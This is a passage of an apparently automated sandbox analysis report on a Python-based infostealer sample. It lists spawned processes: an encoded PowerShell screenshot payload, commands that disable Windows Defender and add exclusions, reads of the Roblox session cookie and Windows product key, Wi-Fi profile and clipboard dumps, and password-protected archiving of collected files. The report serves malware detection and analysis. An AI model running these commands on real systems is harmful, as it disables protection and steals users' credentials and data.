gAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
